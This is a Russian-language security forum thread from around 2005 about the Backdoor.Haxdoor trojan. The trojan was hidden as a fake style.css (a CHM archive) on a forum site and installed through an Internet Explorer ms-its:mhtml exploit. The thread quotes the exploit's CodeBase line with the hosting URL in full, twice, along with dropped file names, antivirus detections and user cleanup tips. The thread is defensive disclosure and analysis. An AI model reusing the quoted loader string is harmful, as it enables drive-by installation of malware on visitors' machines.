BackDoor.Haxdoor устанавливается при просмотре сайтов

Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
CodeBase: ms-its:mhtml:file://d:\foo.mht![url]http://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css::/open.exe[/url]
CLSID: {11111111-1111-1111-1111-222222222222}

Данная информация передана в лабораторию Касперского и другим вирусологам, но позволяет пролить свет на типовую методику внедрения данного зверя на компьютеры пользователей. Пользователь, которого занесло на указанный ресурс, работал под XP SP1 с включенным Firewall - и это его естественно не спасло. В ходе лечения на ПК изловлен типовой набор файлов, в частности:
open.exe - это инсталлятор "зверя", размер 44177 байт
wd.sys - 4096 байт
vdnt32.sys - 14832 байт
memlow.sys - 4096 байт
hm.sys - 14832 байт
draw32.dll - 33568 байт
cm.dll - 33568 байт
Как и известные разновидности, данная применяет руткит-механизмы, основанные на перехвате функций в User и Kernel режиме.
Администрации сайта techlabs.ru я отписал письмо с описанием того, что их сайт применяется как источник зверя ....

[quote author=Зайцев Олег link=board=4;threadid=1103;start=0#msg10446 date=1113370404]
Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
CodeBase: ms-its:mhtml:file://d:\foo.mht![url]http://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css::/open.exe[/url]
CLSID: {11111111-1111-1111-1111-222222222222}
...
[/quote]
А можно пояснить, как происходит заражение? В некотором htm есть ссылка на style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?

[QUOTE=userr]
А можно пояснить, как происходит заражение? В некотором htm есть ссылка на style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?
[/QUOTE]
Да, примерно так ... вообще методик известно великое множество, наиболее распространенные относятся к категории Exploit.HTML.mht - в теле страницы встречается характерный код типа ... <object data="ms-its:mhtml:file: ... - при его исполнении происходит загрузка и выполнение вредоносного кода. В данном случае применена именно такая технология в типовой реализации - когда "зверь" хранится в CHM файле, причем имя и расширение файла не играют особого значения. Есть и другие варианты - с применением апплетов, JPEG картинок с модифицированным заголовком ...
Причем что интересно - я утром отправил создателям сайта techlabs.ru письмо с описанием ситуации - между тем вредоносный файл по прежнему на месте.

Может они так зарабатывают :)

Это только на IE работает?

Ради интереса переодически кидаю его на вирусскан...

на 15-16 msk:
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

на 19:45 msk:
Dr.Web ***Found Trojan.PWS.LDPinch.394
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

[quote author=Участковый link=board=4;threadid=1103;start=0#msg10516 date=1113402436]
Это только на IE работает?
[/quote]
Судя пл всему да. Я не проверял на других браузерах, но подобные эксплоиты характерны в основном для IE.

[b]Posted by: shu_b [/b]
Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере

на 14.04.05 22:20 msk

Dr.Web ***Found Trojan.PWS.LDPinch.394
Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

[QUOTE=shu_b]
на 14.04.05 22:20 msk

Dr.Web ***Found Trojan.PWS.LDPinch.394
Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)
[/QUOTE]
Сегодня вечером я получил ответ от ЛК - все компоненты "зверя" классифицировали как и предполагалось - Backdoor.Haxdoor.cr. От создателей сайта [url]http://techlabs.ru[/url] ответ так и не пришел, но сегодня я качнул файлик style.css- уже "Ошибка 404"... - файл вроде как убрали

Последний раз на 15.04.05 20:00 msk:

BitDefender ***Found BehavesLike:Trojan.FirewallBypass (probable variant)
Dr.Web Found Trojan.PWS.LDPinch.394
Kaspersky Anti-Virus Found Trojan-Dropper.Win32.Small.ta
NOD32 Found probably unknown NewHeur_PE (probable variant)
VBA32 Found Trojan.LdPinch.4 (probable variant)

[quote author=Зайцев Олег link=board=4;threadid=1103;start=0#msg10523 date=1113408675]
Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере
[/quote]
Наверное нашему эвристику поверили ;D

хотя он и ошибся.... это ведь не пинчь... тогдаб уж назвали PSW-Trojan

хочу с вами познакомиться...

Со всеми сразу, или по очереди?:)

:))))

>[QUOTE=Зайцев Олег]Сегодня на одном из ПК я изловил свежайшую >разновидность Backdoor.Haxdoor.

Это уже не свежая разновидность
хотя алгоритм тот же
Поймал у себя Haxdoor.cn версию этой заразы AVP не мог убить
файлы убиватьв Safe mode:

mszx32.exe - наверное теперь вместо open.exe

- cz.dll
- drct16.dll
- hz.sys
- vdmt16.sys
- winlow.sys
- wz.sys

лежит вся прелесть в system32
Кстати после изоляции вышеперечисленных файлов из родной папочки
каспер их стал видеть.

ну и в реестре ищите ссылки на winlow; vdmt16 и drct16

файлы перечисленные Олегом нифига не найдены, зато есть ключики в реестре (маскировка???) которые выносятся очень легко и просто.
Зато с ключами про winlow; vdmt16 придется попотеть.

Если создатель сего творения это прочитает, то пусть знает ОН ГАД КАКИХ МАЛО!!!!

А я то думал, шо опять комп бочит! Ведь тока систему переустановил! Сначала я воевал с Bloodhound.w32.ep, теперь Нортон обновив, напоролся на Backdoor.Haxdoor. Полный идиотизм - я что, приманка для троянов?!! Короче - кончайте все вирусы, беспощадно!

Спасибо за ценное описание (Гостю отдельно). Очень помогло.

Перемещено в "Помогите" -
[url]http://www.virusinfo.info/showthread.php?t=3281[/url]

Седня клиенты жаловались что у них в системе вирусня
Симантек 10.0 молчит как партизан (обновление 09.11.05)
Просканил систему с помощью AVZ 4.1

Лог скана не сохранил к сожалению....
Но AVZ сразу начал ругатся типа
обнаружена маскировка процесса explorer.exe и winlogon.exe
посморел через диспетчер процессов какие библиотеки использует
увидев такие подозрительные как
tcpQ32.dll - не есть гууд.
Заодно она прписалась в HKLM_SOFTWARE_Micrososft_WINNT_Winlogon
и оттудова никак не убирается....в Safe Mode тоже самое
Пришлось грузится с ERD и ручками рубить на корню в реестре
а заодно в System32...
После этого загрузился нормально и запустил скан Симантека
Мля скокоже он гадости надыбал
Backdoor.haxdor.E
Вопрос почему до этого молчал?? Ведь же вирус не такой новый..
Приходилось сталкиватся, до этого Backdoor.haxdor.C